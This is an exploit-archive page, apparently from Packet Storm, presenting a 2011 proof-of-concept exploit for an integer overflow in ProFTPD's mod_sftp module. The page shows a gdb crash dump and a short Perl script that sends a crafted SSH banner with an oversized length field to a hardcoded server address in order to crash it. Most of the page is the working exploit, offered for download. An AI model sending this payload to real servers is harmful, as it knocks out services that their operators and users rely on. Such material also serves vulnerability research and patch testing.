exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ProFTPD mod_sftp Integer Overflow

ProFTPD mod_sftp Integer Overflow
Posted Feb 7, 2011
Authored by Kingcope

ProFTPD mod_sftp integer overflow denial of service proof of concept exploit.

tags | exploit, denial of service, overflow, proof of concept
SHA-256 | 8be96176ffeabb738a525695e7d76457f45c838d9df2d027c6217df3d5d527c2

ProFTPD mod_sftp Integer Overflow

Change Mirror Download
#ProFTPD mod_sftp Integer Overflow
#by Kingcope
#reference: http://www.castaglia.org/proftpd/modules/mod_sftp.html

# Exploit Title: ProFTPD mod_sftp Integer Overflow
# Date: 7 February 2011
# Author: Kingcope
# Software Link: http://www.castaglia.org/proftpd/modules/mod_sftp.html
# Tested on: Centos 5.5

#Program received signal SIGSEGV, Segmentation fault.
#0x00391577 in memset () from /lib/libc.so.6
#(gdb) i r
#eax 0x0 0
#ecx 0x203fffef 541065199
#edx 0x1 1
#ebx 0x80ffffbd -2130706499
#esp 0xbfcfd088 0xbfcfd088
#ebp 0xbfcfd0a8 0xbfcfd0a8
#esi 0x0 0
#edi 0x0 0
#eip 0x391577 0x391577 <memset+55>
#eflags 0x210202 [ IF RF ID ]
#cs 0x73 115
#ss 0x7b 123
#ds 0x7b 123
#es 0x7b 123
#fs 0x0 0
#gs 0x33 51
#(gdb) x/10i $eip
#0x391577 <memset+55>: rep stos %eax,%es:(%edi)
#0x391579 <memset+57>: mov %edx,%ecx
#0x39157b <memset+59>: rep stos %al,%es:(%edi)
#0x39157d <memset+61>: mov 0x8(%esp),%eax
#0x391581 <memset+65>: pop %edi
#0x391582 <memset+66>: ret
#0x391583: nop
#0x391584: nop
#0x391585: nop
#0x391586: nop

use IO::Socket;

$|=1;

$pl = "\x53\x53\x48\x2D\x32\x2E\x30\x2D\x31\x2E\x32\x37\x20\x73\x73\x68\x6C\x69\x62\x3A\x20\x57\x69\x6E\x53\x53".
"\x48\x44\x20\x33\x2E\x30\x35\x0D\x0A\x80\xff\xff\xff" . "AAAAAAAAAA";

my $sock = IO::Socket::INET->new(PeerAddr => "192.168.2.5",
PeerPort => '21',
Proto => 'tcp');

read($sock, $xp, 10);
#$x = <stdin>;
print $sock $pl;
exit;

Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close